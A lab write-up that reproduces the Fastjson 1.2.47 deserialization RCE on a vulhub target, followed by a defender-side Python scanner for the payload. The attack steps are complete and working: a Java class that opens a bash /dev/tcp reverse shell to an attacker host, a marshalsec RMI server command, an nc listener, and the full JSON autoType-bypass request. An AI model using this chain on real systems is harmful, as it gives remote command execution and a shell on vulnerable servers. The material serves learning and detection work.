Fastjson 1.2.47 Remote Command Execution Vulnerability
0X00-Introduction
0X01-Environment Setup
Target: CentOS Linux 7
Attacker: Windows Server 2016 && Kali
Environment: vulhub
Project address: https://github.com/vulhub/vulhub
To set up vulhub, visit:
Tools: Burp Suite, marshalsec-0.0.3-SNAPSHOT-all.jar, JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar (download links below)
0X02-Vulnerability Description
Fastjson is an open-source JSON parser from Alibaba. Its performance is excellent, and it is widely used in the Java projects of major vendors. Fastjson added a deserialization whitelist after version 1.2.24, but in versions before 1.2.48 an attacker can use a specially constructed JSON string to bypass the whitelist check and execute arbitrary commands.
0X03-Vulnerability Reproduction
Apache log4j2 is exploited in a similar way to fastjson; the EXP is the same.
http://192.168.234.128:8090/
01-Compile the EXP / start a web server
EXP:
public class Exploit {
    public Exploit() {
        try {
            // command to execute
            String[] commands = {"bash", "-c", "exec 5<>/dev/tcp/192.168.234.135/12345;cat <&5 | while read line; do $line 2>&5 >&5; done"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}
javac Exploit.java  # compile
Start a web server:
python -m SimpleHTTPServer 666  # Python 2
python -m http.server 666  # Python 3
02-Reverse shell
Start the RMI service, listen on a port, and specify the remote class Exploit.class to load, then run:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.234.135:666/#Exploit" 9999
Start the listener:
nc -lvvp 12345
Send the POC with Burp.
Note: change the Content-Type.
POST / HTTP/1.1
Host: 192.168.234.128:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 270
{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://192.168.234.135:9999/Exploit.class",
        "autoCommit": true
    }
}
Success.
0X04-Detection Tools
https://github.com/Maskhe/FastjsonScan
0X05-Disclaimer
For learning and reference only.
0X06-References
https://vulhub.org/#/environments/fastjson/1.2.47-rce/
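As an added defender-side example (not part of the original write-up), the following Python snippet scans a JSON request body for the two indicators this POC relies on: a `java.lang.Class` entry that caches a gadget class name in `val`, and a `JdbcRowSetImpl` whose `dataSourceName` is a JNDI URL. The sample body and the host name `attacker.example` are constructed for the example.

```python
from __future__ import annotations
import json
import re
from typing import Any, Iterator

# Gadget classes named in this write-up; extend from your own inventory.
GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}
JNDI_URL = re.compile(r"^(rmi|ldap|ldaps|iiop)://", re.IGNORECASE)

# Constructed request body mirroring the POC shape (host is a placeholder).
SAMPLE_BODY = """{
  "a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},
  "b": {"@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://attacker.example:9999/Exploit",
        "autoCommit": true}
}"""

def walk(node: Any, path: str = "$") -> Iterator[tuple[str, dict]]:
    """Yield every JSON object in the document together with its JSONPath-like location."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from walk(value, f"{path}[{i}]")

def scan_body(body: str) -> list[str]:
    """Return findings describing fastjson autoType abuse indicators (empty if clean)."""
    findings: list[str] = []
    try:
        doc = json.loads(body)
    except ValueError:
        return findings  # not JSON; nothing for fastjson to deserialize
    cached: set[str] = set()
    for path, obj in walk(doc):
        typ = obj.get("@type")
        if typ is None:
            continue
        # 1.2.47 trick: deserializing java.lang.Class caches the class named in "val",
        # so a later @type naming that class slips past the autoType check.
        if typ == "java.lang.Class" and isinstance(obj.get("val"), str):
            cached.add(obj["val"])
            findings.append(f"{path}: java.lang.Class caches {obj['val']!r}")
        if typ in GADGET_CLASSES or typ in cached:
            findings.append(f"{path}: @type names gadget {typ!r}")
        ds = obj.get("dataSourceName")
        if isinstance(ds, str) and JNDI_URL.match(ds):
            findings.append(f"{path}: JNDI lookup target {ds!r}")
    return findings

if __name__ == "__main__":
    for finding in scan_body(SAMPLE_BODY):
        print(finding)
```

Run the scanner over request bodies from a WAF or access log with body capture; any hit on the `java.lang.Class` caching step is worth alerting on even when the gadget class is not in the list.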